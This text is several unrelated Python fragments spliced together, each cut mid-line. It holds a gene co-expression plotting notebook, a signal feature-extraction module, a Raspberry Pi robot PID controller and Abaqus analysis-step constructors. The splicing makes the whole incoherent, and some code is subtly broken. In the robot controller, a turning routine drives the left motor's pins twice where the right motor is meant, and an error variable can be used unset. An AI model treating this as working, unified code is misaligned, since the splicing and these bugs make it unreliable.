# Calculate the percent of co-expressed genes that are non co-operonic (real data)
real_percent_non_cooperonic_coexpressed_core_genes = (
real_core_df['num_non_cooperonic_coexpressed_genes']/real_core_df['num_coexpressed_genes'])
real_percent_non_cooperonic_coexpressed_acc_genes = (
real_acc_df['num_non_cooperonic_coexpressed_genes']/real_acc_df['num_coexpressed_genes'])
# There are NaNs in cases where there are 0 co-expressed genes and therefore 0 non-cooperonic genes
real_num_core_na = real_percent_non_cooperonic_coexpressed_core_genes.isna().sum()
real_num_acc_na = real_percent_non_cooperonic_coexpressed_acc_genes.isna().sum()
# Since we are concerned with "of those co-expressed genes how many are in NOT in the same operon", we will remove these
real_percent_non_cooperonic_coexpressed_core_genes_noNa = real_percent_non_cooperonic_coexpressed_core_genes.dropna(inplace=False)
real_percent_non_cooperonic_coexpressed_acc_genes_noNa = real_percent_non_cooperonic_coexpressed_acc_genes.dropna(inplace=False)
# In[16]:
## TEST: What does distribution look like before removing NaNs?
# Get bins using all data
hist, bins_num_percent_non_cooperonic_real = np.histogram(
np.concatenate(
[real_percent_non_cooperonic_coexpressed_core_genes.fillna(0),
real_percent_non_cooperonic_coexpressed_acc_genes.fillna(0)]
)
)
# Set up the matplotlib figure
fig, axes = plt.subplots(ncols=2, nrows=1)
# Distribution of percent of co-expressed genes that are NOT co-operonic in real data
sns.distplot(real_percent_non_cooperonic_coexpressed_core_genes.fillna(0),
label='core',
color='red',
kde=False,
bins=bins_num_percent_non_cooperonic_real,
ax=axes[0])
sns.distplot(real_percent_non_cooperonic_coexpressed_acc_genes.fillna(0),
label='accessory',
color='blue',
kde=False,
bins=bins_num_percent_non_cooperonic_real,
ax=axes[1])
plt.suptitle('TEST'.
format(coexpression_threshold))
axes[0].legend(prop={'size': 12})
axes[1].legend(prop={'size': 12})
fig.text(0.5, 0.01, 'Percent of co-expressed non-cooperonic genes', ha='center')
axes[0].set_ylabel('Count')
# In[17]:
# Get bins using all data
hist, bins_num_percent_non_cooperonic_real = np.histogram(
np.concatenate(
[real_percent_non_cooperonic_coexpressed_core_genes_noNa,
real_percent_non_cooperonic_coexpressed_acc_genes_noNa]
)
)
# Set up the matplotlib figure
fig, axes = plt.subplots(ncols=2, nrows=1)
# Distribution of percent of co-expressed genes that are NOT co-operonic in real data
sns.distplot(real_percent_non_cooperonic_coexpressed_core_genes_noNa,
label='core',
color='red',
kde=False,
bins=bins_num_percent_non_cooperonic_real,
ax=axes[0])
sns.distplot(real_percent_non_cooperonic_coexpressed_acc_genes_noNa,
label='accessory',
color='blue',
kde=False,
bins=bins_num_percent_non_cooperonic_real,
ax=axes[1]
)
plt.suptitle('Percent of co-expressed genes that are NOT co-operonic (real data, threshold={})'.
format(coexpression_threshold))
axes[0].legend(prop={'size': 12})
axes[1].legend(prop={'size': 12})
fig.text(0.5, 0.01, 'Percent of co-expressed non-cooperonic genes', ha='center')
axes[0].set_ylabel('Count')
# In[18]:
# Calculate the percent of co-expressed genes that are non co-operonic (shuffled data)
shuffled_percent_non_cooperonic_coexpressed_core_genes = (
shuffled_core_df['num_non_cooperonic_coexpressed_genes']/shuffled_core_df['num_coexpressed_genes'])
shuffled_percent_non_cooperonic_coexpressed_acc_genes = (
shuffled_acc_df['num_non_cooperonic_coexpressed_genes']/shuffled_acc_df['num_coexpressed_genes'])
# There are NaNs in cases where there are 0 co-expressed genes and therefore 0 non-cooperonic genes
shuffled_num_core_na = shuffled_percent_non_cooperonic_coexpressed_core_genes.isna().sum()
shuffled_num_acc_na = shuffled_percent_non_cooperonic_coexpressed_acc_genes.isna().sum()
# Since we are concerned with "of those co-expressed genes how many are in NOT in the same operon", we will remove these
shuffled_percent_non_cooperonic_coexpressed_core_genes_noNa = shuffled_percent_non_cooperonic_coexpressed_core_genes.dropna(
inplace=False)
shuffled_percent_non_cooperonic_coexpressed_acc_genes_noNa = shuffled_percent_non_cooperonic_coexpressed_acc_genes.dropna(
inplace=False)
# In[19]:
# Get bins using all data
hist, bins_num_percent_non_cooperonic_shuffled = | |
<gh_stars>1-10
# -*- coding: utf-8 -*-
#Imports
from scipy.stats import kurtosis, skew
import novainstrumentation as ni
import numpy as np
from scipy import signal
# #################################### TEMPORAL DOMAIN ############################################################# #
########################################################################################################################
def distance(sig):
""" Calculates the total distance traveled by the signal,
using the hipotenusa between 2 datapoints
Parameters
----------
s: array-like
the input signal.
Returns
-------
signal distance: if the signal was straightened distance
"""
df_sig = np.diff(sig)
return np.sum([np.sqrt(1+df**2) for df in df_sig])
# Autocorrelation
def autocorr(sig):
"""Compute autocorrelation along the specified axis.
Parameters
----------
sig: ndarray
input from which autocorrelation is computed.
Returns
-------
corr: float
Cross correlation of 1-dimensional sequence.
"""
return float(np.correlate(sig, sig))
def zero_cross(sig):
"""Compute Zero-crossing rate along the specified axis.
total number of times that the signal changes from positive to negative or vice versa, normalized by the window length.
Parameters
----------
sig: ndarray
input from which the zero-crossing rate are computed.
Returns
-------
count_vector: int
number of times that signal value cross the zero axe.
"""
#return np.where(ny.diff(ny.sign(sig)))[0]
return len(np.where(np.diff(np.sign(sig)))[0])
def calc_meanadiff(sig):
"""Compute mean absolute differences along the specified axes.
Parameters
----------
input: ndarray
input from which mean absolute deviation is computed.
Returns
-------
mad: int
mean absolute difference result.
"""
return np.mean(abs(np.diff(sig)))
def calc_medadiff(sig):
"""Compute median absolute differences along the specified axes.
Parameters
----------
input: ndarray
input from which mean absolute deviation is computed.
Returns
-------
mad: int
mean absolute difference result.
"""
return np.median(abs(np.diff(sig)))
def calc_sadiff(sig):
"""Compute sum of absolute differences along the specified axes.
Parameters
----------
input: ndarray
input from which sum absolute diff is computed.
Returns
-------
mad: int
sum absolute difference result.
"""
return np.sum(abs(np.diff(sig)))
def calc_meandiff(sig):
"""Compute mean of differences along the specified axes.
Parameters
----------
input: ndarray
input from which mean absolute deviation is computed.
Returns
-------
mad: int
mean absolute difference result.
"""
return np.mean(np.diff(sig))
def calc_meddiff(sig):
"""Compute mean of differences along the specified axes.
Parameters
----------
input: ndarray
input from which mean absolute deviation is computed.
Returns
-------
mad: int
mean absolute difference result.
"""
return np.median(np.diff(sig))
#create time
def compute_time(sign, FS):
"""Creates the signal correspondent time array.
"""
time = range(len(sign))
time = [float(x)/FS for x in time]
return time
def signal_energy(sign, time):
"""Computes the energy of the signal. For that, first is made the segmentation of the signal in 10 windows
and after it's considered that the energy of the signal is the sum of all calculated points in each window.
Parameters
----------
sign: ndarray
input from which max frequency is computed.
Returns
-------
energy: float list
signal energy.
time_energy: float list
signal time energy
"""
window_len = len(sign)
# window for energy calculation
if window_len < 10:
window = 1
else:
window = window_len//10 # each window of the total signal will have 10 windows
energy = np.zeros(window_len//window)
time_energy = np.zeros(window_len//window)
i = 0
for a in range(0, len(sign) - window, window):
energy[i] = np.sum(np.array(sign[a:a+window])**2)
interval_time = time[int(a+(window//2))]
time_energy[i] = interval_time
i += 1
return list(energy), list(time_energy)
# Temporal Centroid
def centroid(sign, FS):
"""Computes the centroid along the time axis.
----------
sign: ndarray
input from which max frequency is computed.
fs: int
signal sampling frequency.
Returns
-------
centroid: float
temporal centroid
"""
time = compute_time(sign, FS)
energy, time_energy=signal_energy(sign, time)
total_energy = np.dot(np.array(time_energy),np.array(energy))
energy_sum = np.sum(energy)
if energy_sum == 0 or total_energy == 0:
centroid = 0
else:
centroid = total_energy / energy_sum
return centroid
# Total Energy
def total_energy(sign, FS):
"""
Compute the acc_total power, using the given windowSize and value time in samples
"""
time = compute_time(sign, FS)
return np.sum(np.array(sign)**2)/(time[-1]-time[0])
########################################################################################################################
# ############################################ SPECTRAL DOMAIN ####################################################### #
########################################################################################################################
def plotfft(s, fmax):
""" This functions computes the fft of a signal, returning the frequency
and their magnitude values.
Parameters
----------
s: array-like
the input signal.
fmax: int
the sampling frequency.
doplot: boolean
a variable to indicate whether the plot is done or not.
Returns
-------
f: array-like
the frequency values (xx axis)
fs: array-like
the amplitude of the frequency values (yy axis)
"""
fs = abs(np.fft.fft(s))
f = np.linspace(0, fmax // 2, len(s) // 2)
return (f[1:len(s) // 2].copy(), fs[1:len(s) // 2].copy())
def _bigPeaks(s, th, min_peak_distance=5, peak_return_percentage=0.1):
pp = []
if not list(s):
return pp
else:
p = ni.peaks(s, th)
if not list(p):
return pp
else:
p = ni.clean_near_peaks(s, p, min_peak_distance)
if not list(p):
return pp
else:
ars = np.argsort(s[p])
pp = p[ars]
num_peaks_to_return = int(np.ceil(len(p) * peak_return_percentage))
pp = pp[-num_peaks_to_return:]
return pp
# Compute Fundamental Frequency
def fundamental_frequency(s, FS):
# TODO: review fundamental frequency to guarantee that f0 exists
# suggestion peak level should be bigger
# TODO: explain code
"""Compute fundamental frequency along the specified axes.
Parameters
----------
s: ndarray
input from which fundamental frequency is computed.
FS: int
sampling frequency
Returns
-------
f0: int
its integer multiple best explain the content of the signal spectrum.
"""
s = s - np.mean(s)
f, fs = plotfft(s, FS)
fs = fs[1:len(fs) // 2]
f = f[1:len(f) // 2]
try:
cond = np.where(f > 0.5)[0][0]
except:
cond = 0
bp = _bigPeaks(fs[cond:], 0)
if not list(bp):
f0 = 0
else:
bp = bp + cond
f0 = f[min(bp)]
return f0
def max_frequency(sig, FS):
"""Compute max frequency along the specified axes.
Parameters
----------
sig: ndarray
input from which max frequency is computed.
FS: int
sampling frequency
Returns
-------
f_max: int
0.95 of max_frequency using cumsum.
"""
f, fs = plotfft(sig, FS)
t = np.cumsum(fs)
try:
ind_mag = np.where(t > t[-1]*0.95)[0][0]
except:
ind_mag = np.argmax(t)
f_max = f[ind_mag]
return f_max
def median_frequency(sig, FS):
"""Compute median frequency along the specified axes.
Parameters
----------
sig: ndarray
input from which median frequency is computed.
FS: int
sampling frequency
Returns
-------
f_max: int
0.50 of max_frequency using cumsum.
"""
f, fs = plotfft(sig, FS)
t = np.cumsum(fs)
try:
ind_mag = np.where(t > t[-1] * 0.50)[0][0]
except:
ind_mag = np.argmax(t)
f_median = f[ind_mag]
return f_median
def ceps_coeff(sig,coefNumber):
"""Compute cepstral coefficients along the specified axes.
Parameters
----------
sig: ndarray
input from which cepstral coefficients are computed.
coefNumber:
Returns
-------
cc: ndarray
"""
est=lpc_coef(sig,coefNumber)
cc=lpcar2cc(est)
if len(cc)==1:
cc=float(cc)
else:
cc=tuple(cc)
return cc
# Power Spectrum Density
def max_power_spectrum(sig, FS):
"""Compute power spectrum density along the specified axes.
Parameters
----------
sig: ndarray
input from which cepstral coefficients are computed.
FS: scalar
sampling frequency
Returns
-------
max_power: ndarray
max value of the power spectrum.
peak_freq: ndarray
max frequency corresponding to the elements in power spectrum.
"""
if np.std(sig) == 0:
return float(max(signal.welch(sig, int(FS), nperseg=len(sig))[1]))
else:
return float(max(signal.welch(sig/np.std(sig), int(FS), nperseg=len(sig))[1]))
def power_bandwidth(sig, FS, samples):
"""Compute power spectrum density bandwidth along the specified axes.
Parameters
----------
sig: ndarray
input from which cepstral coefficients are computed.
FS: scalar
sampling frequency
samples: int
number of bands
Returns
-------
bandwidth: ndarray
power in bandwidth
"""
bd = []
bdd = []
freq, power = signal.welch(sig/np.std(sig), FS, nperseg=len(sig))
for i in range(len(power)):
bd += [float(power[i])]
bdd += bd[:samples]
return tuple(bdd)
def trfbank(fs, nfft, lowfreq, linsc, logsc, nlinfilt, nlogfilt):
"""Compute triangular filterbank for MFCC computation."""
# Total number of filters
nfilt = nlinfilt + nlogfilt
#------------------------
# Compute the filter bank
#------------------------
# Compute start/middle/end points of the triangular filters in spectral domain
freqs = np.zeros(nfilt+2) #modified
freqs[:nlinfilt] = lowfreq + np.arange(nlinfilt) * linsc
freqs[nlinfilt:] = freqs[nlinfilt-1] * logsc ** np.arange(1, nlogfilt + 3)
heights = 2./(freqs[2:] - freqs[0:-2])
# Compute filterbank coeff (in fft domain, in bins)
fbank = np.zeros((nfilt, nfft))
# FFT bins (in Hz)
nfreqs = np.arange(nfft) / (1. * nfft) * fs
for i in range(nfilt):
low = freqs[i]
cen = freqs[i+1] #modified
hi = freqs[i+2] #modified
lid = np.arange(np.floor(low * nfft / fs) + 1,
np.floor(cen * nfft / fs) + 1, dtype=int)
lslope = heights[i] / (cen - low)
rid = np.arange(np.floor(cen * nfft / fs) + 1,
np.floor(hi * nfft / fs) + 1, dtype=int)
rslope = heights[i] / (hi - cen)
fbank[i][lid] = lslope * (nfreqs[lid] - low)
fbank[i][rid] = rslope * (hi - nfreqs[rid])
return fbank, freqs
########################################################################################################################
####################################### STATISTICAL DOMAIN #############################################################
########################################################################################################################
def interq_range(sig):
"""Compute interquartile range along the specified axis.
Parameters
----------
sig: ndarray
input from which interquartile range | |
import RPi.GPIO as GPIO
import time
import read_RPM
import threading
import setup_robo
import sys
import multiprocessing
from Gyro_new import Gyro
#from mpu6050 import mpu6050
class Control_robo:
def __init__(self, encoder_1, encoder_2, SAMPLE_TIME, motor_1, motor_2):
self.encoder_1 = encoder_1 ## LEFT ENCODER
self.encoder_2 = encoder_2 ## RIGHT ENCODER
### RPM DATA TO USE ON PID
self.RPM_1 = 0
self.RPM_2 = 0
self.SAMPLE_TIME = SAMPLE_TIME
self.motor_1 = motor_1 ##LEFT MOTOR
self.motor_2 = motor_2 ##RIGHT MOTOR
## SETUP PWM
self.p = GPIO.PWM(self.motor_1.enable, 1000)
self.p2 = GPIO.PWM(self.motor_2.enable, 1000)
self.p.start(25)
self.p2.start(25)
## SETUP START DUTY VALUES
self.duty_1_value = 15
self.duty_2_value = 15
#self.TARGET = 80 # USE ONLY WITH PID ENCODER CONTROL
## SETUP INITIAL TARGETS TO RPM
self.TARGET_1 = 80 #USE WITH PID ENCODER + GYRO CONTROL (DONT CHANGE WITH TIME)
self.TARGET_2 = 80 #USE WITH PID ENCODER + GYRO CONTROL (THIS CHANGES WITH TIME)
## SETUP INITIAL TARGET TO GYRO
self.TARGET_ANGLE = 0 # USE WITH PID ENCODER + GYRO CONTROL
self.angle_z = 0 #VARIABLE WITH GYRO READ DATA
self.select = 'p'
self.gyro = Gyro()
self.gyro.calibration()
self.focus = 0
def background_2(self):
def run_2(self):
## CREATE THREAD TO READ IMU DATA
print("Starting Thread 1")
thread_gyro = threading.Thread(target = gyro_read, args = (self,))
thread_gyro.daemon = True
thread_gyro.start()
## CREAT THREAD TO READ ENCODERS DATA
print("Starting Thread 2")
thread_RPM = threading.Thread(target = rpm_read, args = (self,))
thread_RPM.daemon = True
thread_RPM.start()
### CREATE THREAD TO PID CONTROL
print("Starting Thread 3")
thread_PID = threading.Thread(target = pid_angle, args =(self,))
thread_PID.daemon = True
thread_PID.start()
def rpm_read(self):
while True:
self.RPM_1 = self.encoder_1.RPM()
self.RPM_2 = self.encoder_2.RPM()
#time.sleep(SAMPLE_TIME/100) ## define the refresh rate to read RPM
def gyro_read(self):
## THE REFRESH RATE ALREADY IS ON GYRO CLASS (DONT CHANGE THE RATE)
while True:
angle_data = self.gyro.reading()
self.angle_z = angle_data['z']
'''
angle_x = angle_data['x']
angle_y = angle_data['y']
print("ANGLE DATA Z: ",self.angle_z)
print("ANGLE DATA x: ", angle_x)
print("ANGLE DATA Y: ", angle_y)
'''
##REFRESH Z AXIS GYRO DATA WITH GYRO READ FREQUENCY
## aumentar frequencia do gyro ja que agora estamos usando thread independente? TESTAR
## CRIAR UMA THREAD TAMBEM PARA O RPM_READ?? talvez seja interessante
## uma thread para o controle pid e focus, outra pro read rpm e outra pro read gyro
## isso causaria interferencia de frequencias ou melhoraria o desempenho??
## o read_rpm tem uma frequencia, o gyro outra e o PID pode ser otimizado deixando-as separadas?
def pid_angle(self):
#KI MELHORES VALORES ATE AGORA
'''
KP = 0.0032
KD = 0.0008
KI = 0.00002
'''
error_prev = 0
sum_z = 0
## PID RPM DATA
KPr = 0.05
KDr = 0.03
KIr = 0.0005
e1_prev = 0
e2_prev = 0
e1_sum = 0
e2_sum = 0
while True:
## CALCULATE ERROR FOR ANGLE DATA
## USES GLOBAL ANGLE READ AT READ_THREAD
error_z = self.TARGET_ANGLE - self.angle_z ##ERROR NEGATIVO DOBRANDO PRA DIREITA
diff_z = (error_z - error_prev)/0.02 ## CHANGE THIS VALUE OF TIME IF CHANGE SAMPLE RATE
print("error: ", error_z)
## CALL FOCUS FUNCTION TO FIND THE WAY IF TOO LOST
'''
if error_z > 35 or error_z < -35:
focus(self)
'''
## when here this thread stops the pid control to work at focus, is this a problem??
## quando sair daqui tem que voltar a condição de output de cada motor
## com o duty que tava
## CALL DIRECTION FUNCTION WITH PID TO ANGLE CONTROL
direction(self, error_z, diff_z, sum_z)
self.TARGET_2 = max(min(250, self.TARGET_2), 50)
## CALCULATE ERROR FOR RPM DATA
if self.RPM_1 < 600:
RPM_1_error = self.TARGET_1 - self.RPM_1 ##WILL TRY TO BE ARROUND 100
e1_diff = (RPM_1_error - e1_prev) ## DERIVATIVE ERROR
if self.RPM_2 < 600:
RPM_2_error = self.TARGET_2 - self.RPM_2 ##WILL TRY TO STABILIZE ANGLE
e2_diff = (RPM_2_error - e2_prev)
##DERIVATIVE ERROR FOR RPM
#e1_diff = (RPM_1_error - e1_prev)
#e2_diff = (RPM_2_error - e2_prev)
if self.select in ('w', 's', 't', 'y', 'h','l','m'):
self.duty_1_value = self.duty_1_value + (RPM_1_error * KPr) + (e1_diff * KDr) + (e1_sum * KIr)
self.duty_2_value = self.duty_2_value + (RPM_2_error * KPr) + (e2_diff * KDr) + (e2_sum * KIr)
if self.select == 'p':
self.duty_1_value = 10
self.duty_2_value = 10
self.duty_1_value = max(min(100,self.duty_1_value), 0)
self.duty_2_value = max(min(100,self.duty_2_value),0)
print("RPM 1: ", self.RPM_1)
print("RPM 2: ", self.RPM_2)
print("\n")
print("DUTY VALUE: ", self.duty_1_value)
print("DUTY VALUE 2: ", self.duty_2_value)
print("\n")
print("SOMA: ", round(sum_z,3))
print("DIFF: ", round(diff_z,3))
print("\n")
print("TARGET 2: ", self.TARGET_2)
print("TARGET 1: ", self.TARGET_1)
print("\n")
print("ERRO ENCODER 1: ", RPM_1_error)
print("ERRO ENCODER 2: ", RPM_2_error)
print("#####################")
## CHANGE DUTY CYCLE VALUES
self.p.ChangeDutyCycle(self.duty_1_value)
self.p2.ChangeDutyCycle(self.duty_2_value)
time.sleep(self.SAMPLE_TIME) ## refresh rate to PID control
## changing this rate may change the values of de constantes KP, KI, KD
if self.select != 'p':
error_prev = error_z
sum_z += error_z
## ENCODERS NEW ERRORS DATA
e1_prev = RPM_1_error
e2_prev = RPM_2_error
e1_sum += RPM_1_error
e2_sum += RPM_2_error
def direction(self, error_z, diff_z, sum_z):
## PID ANGLE DATA
KP = 0.0032
KD = 0.0008
KI = 0.00002
#### REFAZER OS TESTES DE DIREÇÃO NO BACKWARD PORQUE EU PERDI O ARQUIVO QUE TAVA CERTO
if self.select == 'w':
if error_z > 0 and self.TARGET_2 > 80:
self.TARGET_2 = self.TARGET_1 - (error_z * KP) - (diff_z * KD) #- (sum_z * KI) #DISCART SUM TO TRANSITIONS
print("codiçao 1")
elif error_z > 0 and self.TARGET_2 <= 80:
self.TARGET_2 = self.TARGET_2 - (error_z * KP) - (diff_z * KD) - (sum_z * KI)
print("condicao 2")
elif error_z < 0 and self.TARGET_2 <= 80:
self.TARGET_2 = self.TARGET_1 - (error_z * KP) - (diff_z * KD) #- (sum_z * KI) #DISCART SUM TO TRANSITIONS
print("condicao 3")
elif error_z < 0 and self.TARGET_2 > 80:
self.TARGET_2 = self.TARGET_2 - (error_z * KP) - (diff_z * KD) - (sum_z * KI)
print("condicao 4")
if self.select == 's':
if error_z > 0 and self.TARGET_2 <= 80:
self.TARGET_2 = self.TARGET_1 + (error_z * KP) + (diff_z * KD) #- (sum_z * KI) #DISCART SUM TO TRANSITIONS
print("codiçao 1")
elif error_z > 0 and self.TARGET_2 > 80:
self.TARGET_2 = self.TARGET_2 + (error_z * KP) + (diff_z * KD) + (sum_z * KI)
print("condicao 2")
elif error_z < 0 and self.TARGET_2 > 80:
self.TARGET_2 = self.TARGET_1 + (error_z * KP) + (diff_z * KD) #- (sum_z * KI) #DISCART SUM TO TRANSITIONS
print("condicao 3")
elif error_z < 0 and self.TARGET_2 <= 80:
self.TARGET_2 = self.TARGET_2 + (error_z * KP) + (diff_z * KD) + (sum_z * KI)
print("condicao 4")
def focus(self):
########### STOP ALL MOTORS ##########
GPIO.output(self.motor_1.in1, GPIO.LOW)
GPIO.output(self.motor_1.in2, GPIO.LOW)
##RIGHT MOTOR
GPIO.output(self.motor_2.in1, GPIO.LOW)
GPIO.output(self.motor_2.in2, GPIO.LOW)
## CHANGE DUTY OF BOTH MOTORS TO MOTOR 1 DUTY (duty to 80rpm +-)
self.p.ChangeDutyCycle(self.duty_1_value)
self.p2.ChangeDutyCycle(self.duty_1_value)
## READ GYRO DATA AND TURN A LITTLE BIT TO THE RIGHT
## PROCURA FICAR ENTRE O TARGET_ANGLE -10 E TARGET_ANGLE + 10 (20 graus de range)
while self.angle_z < self.TARGET_ANGLE-10 or self.angle_z >self.TARGET_ANGLE+10:
## LEFT MOTOR FORWARD
GPIO.output(self.motor_1.in1, GPIO.HIGH)
GPIO.output(self.motor_1.in2, GPIO.LOW)
## RIGHT MOTOR BACKWARD
GPIO.output(self.motor_1.in1, GPIO.LOW)
GPIO.output(self.motor_1.in2, GPIO.HIGH)
time.sleep(1.5) ## sleep 1.5 seconds
## STOP ALL MOTORS AGAIN
GPIO.output(self.motor_1.in1, GPIO.LOW)
GPIO.output(self.motor_1.in2, GPIO.LOW)
GPIO.output(self.motor_2.in1, GPIO.LOW)
GPIO.output(self.motor_2.in2, GPIO.LOW)
time.sleep(1.5) ## sleep for 1.5 seconds again
## criar condição pra retomar os motores com HIGH e LOW da ultima seleçao de direção
## VER COMO FAZER AS CONDIÇÕES SEM TER QUE FAZER MIL IFS IGUAIS AOS LA DE BAIXO
## se tiver que usar os ifs é só copiar os ifs da thread principal de direçao
run_2(self)
def set_speed(self, x):
temp1 = 1
self.select = x
if x == 'r':
print("run")
if (temp1 == 1):
##LEFT MOTOR
GPIO.output(self.motor_1.in1, GPIO.HIGH)
GPIO.output(self.motor_1.in2, GPIO.LOW)
##RIGHT MOTOR
GPIO.output(self.motor_2.in1, GPIO.HIGH)
GPIO.output(self.motor_2.in2, GPIO.LOW)
print("forward")
x = 'z'
else:
##LEFT MOTOR
GPIO.output(self.motor_1.in1, GPIO.LOW)
GPIO.output(self.motor_1.in2, GPIO.HIGH)
##RIGHT MOTOR
GPIO.output(self.motor_2.in1, GPIO.LOW)
GPIO.output(self.motor_2.in2, GPIO.HIGH)
print("backward")
temp1 = 0
x = 'z'
elif x == 'p':
print("stop")
##LEFT MOTOR
GPIO.output(self.motor_1.in1, GPIO.LOW)
GPIO.output(self.motor_1.in2, GPIO.LOW)
##RIGHT MOTOR
GPIO.output(self.motor_2.in1, GPIO.LOW)
GPIO.output(self.motor_2.in2, GPIO.LOW)
self.duty_1_value = 10
self.duty_2_value = 10
self.select = 'p'
x='z'
elif x == 'w':
#print("forward")
#self.gyro.calibration()
self.duty_1_value = self.duty_1_value | |
representing the whole model. The default value is None.
Returns
-------
step: FrequencyStep
A FrequencyStep object.
"""
self.steps[name] = step = FrequencyStep(name, previous, eigensolver, numEigen, description, shift, minEigen,
maxEigen, vectors, maxIterations, blockSize, maxBlocks, normalization,
propertyEvaluationFrequency, projectDamping, acousticCoupling,
acousticRangeFactor, frictionDamping, matrixStorage, maintainAttributes,
simLinearDynamics, residualModes, substructureCutoffMultiplier,
firstCutoffMultiplier, secondCutoffMultiplier, residualModeRegion,
residualModeDof, limitSavedEigenvectorRegion)
return step
def GeostaticStep(self, name: str, previous: str, description: str = '', nlgeom: Boolean = OFF,
matrixSolver: SymbolicConstant = DIRECT,
matrixStorage: SymbolicConstant = SOLVER_DEFAULT, maintainAttributes: Boolean = False,
solutionTechnique: SymbolicConstant = FULL_NEWTON, reformKernel: int = 8,
convertSDI: SymbolicConstant = PROPAGATED, utol: float = None, timePeriod: float = 1,
timeIncrementationMethod: SymbolicConstant = AUTOMATIC, maxNumInc: int = 100,
initialInc: float = None, minInc: float = None, maxInc: float = None) -> GeostaticStep:
"""This method creates a GeostaticStep object.
Notes
-----
This function can be accessed by:
.. code-block:: python
mdb.models[name].GeostaticStep
Parameters
----------
name
A String specifying the repository key.
previous
A String specifying the name of the previous step. The new step appears after this step
in the list of analysis steps.
description
A String specifying a description of the new step. The default value is an empty string.
nlgeom
A Boolean specifying whether geometric nonlinearities should be accounted for during the
step. The default value is OFF.
matrixSolver
A SymbolicConstant specifying the type of solver. Possible values are DIRECT and
ITERATIVE. The default value is DIRECT.
matrixStorage
A SymbolicConstant specifying the type of matrix storage. Possible values are SYMMETRIC,
UNSYMMETRIC, and SOLVER_DEFAULT. The default value is SOLVER_DEFAULT.
maintainAttributes
A Boolean specifying whether to retain attributes from an existing step with the same
name. The default value is False.
solutionTechnique
A SymbolicConstant specifying the technique used to for solving nonlinear equations.
Possible values are FULL_NEWTON and QUASI_NEWTON. The default value is FULL_NEWTON.
reformKernel
An Int specifying the number of quasi-Newton iterations allowed before the kernel matrix
is reformed.. The default value is 8.
convertSDI
A SymbolicConstant specifying whether to force a new iteration if severe discontinuities
occur during an iteration. Possible values are PROPAGATED, CONVERT_SDI_OFF, and
CONVERT_SDI_ON. The default value is PROPAGATED.
utol
None or a Float specifying the tolerance for maximum change of displacements. The
default value is None.
timePeriod
A Float specifying the total time period. The default value is 1.0.Note:This parameter
is ignored unless *timeIncrementationMethod*=AUTOMATIC.
timeIncrementationMethod
A SymbolicConstant specifying the time incrementation method to be used. Possible values
are FIXED and AUTOMATIC. The default value is AUTOMATIC.
maxNumInc
An Int specifying the maximum number of increments in a step. The default value is 100.
initialInc
A Float specifying the initial time increment. The default value is the total time
period for the step.Note:This parameter is ignored unless
*timeIncrementationMethod*=AUTOMATIC.
minInc
A Float specifying the minimum time increment allowed. The default value is the smaller
of the suggested initial time increment or 10−5 times the total time period.Note:This
parameter is ignored unless *timeIncrementationMethod*=AUTOMATIC.
maxInc
A Float specifying the maximum time increment allowed. The default value is the total
time period for the step.Note:This parameter is ignored unless
*timeIncrementationMethod*=AUTOMATIC.
Returns
-------
step: GeostaticStep
A GeostaticStep object.
"""
self.steps[name] = step = GeostaticStep(name, previous, description, nlgeom, matrixSolver, matrixStorage,
maintainAttributes, solutionTechnique, reformKernel, convertSDI, utol,
timePeriod, timeIncrementationMethod, maxNumInc, initialInc, minInc,
maxInc)
return step
def HeatTransferStep(self, name: str, previous: str, description: str = '', response: SymbolicConstant = TRANSIENT,
timePeriod: float = 1, timeIncrementationMethod: SymbolicConstant = AUTOMATIC,
maxNumInc: int = 100, initialInc: float = None, minInc: float = None,
maxInc: float = None, end: float = None, deltmx: float = 0, mxdem: float = 0,
amplitude: SymbolicConstant = STEP, extrapolation: SymbolicConstant = LINEAR,
matrixSolver: SymbolicConstant = DIRECT,
matrixStorage: SymbolicConstant = SOLVER_DEFAULT, maintainAttributes: Boolean = False,
solutionTechnique: SymbolicConstant = FULL_NEWTON, reformKernel: int = 8,
convertSDI: SymbolicConstant = PROPAGATED) -> HeatTransferStep:
"""This method creates a HeatTransferStep object.
Notes
-----
This function can be accessed by:
.. code-block:: python
mdb.models[name].HeatTransferStep
Parameters
----------
name
A String specifying the repository key.
previous
A String specifying the name of the previous step. The new step appears after this step
in the list of analysis steps.
description
A String specifying a description of the new step. The default value is an empty string.
response
A SymbolicConstant specifying the analysis type. Possible values are STEADY_STATE and
TRANSIENT. The default value is TRANSIENT.
timePeriod
A Float specifying the total time period. The default value is 1.0.
timeIncrementationMethod
A SymbolicConstant specifying the time incrementation method to be used. Possible values
are FIXED and AUTOMATIC. The default value is AUTOMATIC.
maxNumInc
An Int specifying the maximum number of increments in a step. The default value is 100.
initialInc
A Float specifying the initial time increment. The default value is the total time
period for the step.
minInc
A Float specifying the minimum time increment allowed. The default value is the smaller
of 0.8 times the initial time increment or 10−5 times the total time period.
maxInc
A Float specifying the maximum time increment allowed. The default value is the total
time period for the step.
end
None or a Float specifying the temperature change rate (temperature per time) used to
define steady state. When all nodal temperatures are changing at less than this rate,
the solution terminates. The default value is None.Note:This parameter is ignored unless
*response*=STEADY_STATE.
deltmx
A Float specifying the maximum temperature change to be allowed in an increment during a
transient heat transfer analysis. The default value is 0.0.
mxdem
A Float specifying the maximum allowable emissivity change with temperature and field
variables during an increment. The default value is 0.1.
amplitude
A SymbolicConstant specifying the amplitude variation for loading magnitudes during the
step. The default is STEP. Possible values are STEP and RAMP.
extrapolation
A SymbolicConstant specifying the type of extrapolation to use in determining the
incremental solution for a nonlinear analysis. Possible values are NONE, LINEAR, and
PARABOLIC. The default value is LINEAR.
matrixSolver
A SymbolicConstant specifying the type of solver. Possible values are DIRECT and
ITERATIVE. The default value is DIRECT.
matrixStorage
A SymbolicConstant specifying the type of matrix storage. Possible values are SYMMETRIC,
UNSYMMETRIC, and SOLVER_DEFAULT. The default value is SOLVER_DEFAULT.
maintainAttributes
A Boolean specifying whether to retain attributes from an existing step with the same
name. The default value is False.
solutionTechnique
A SymbolicConstant specifying the technique used to for solving nonlinear equations.
Possible values are FULL_NEWTON and QUASI_NEWTON. The default value is FULL_NEWTON.
reformKernel
An Int specifying the number of quasi-Newton iterations allowed before the kernel matrix
is reformed.. The default value is 8.
convertSDI
A SymbolicConstant specifying whether to force a new iteration if severe discontinuities
occur during an iteration. Possible values are PROPAGATED, CONVERT_SDI_OFF, and
CONVERT_SDI_ON. The default value is PROPAGATED.
Returns
-------
step: HeatTransferStep
A HeatTransferStep object.
"""
self.steps[name] = step = HeatTransferStep(name, previous, description, response, timePeriod,
timeIncrementationMethod, maxNumInc, initialInc, minInc, maxInc, end,
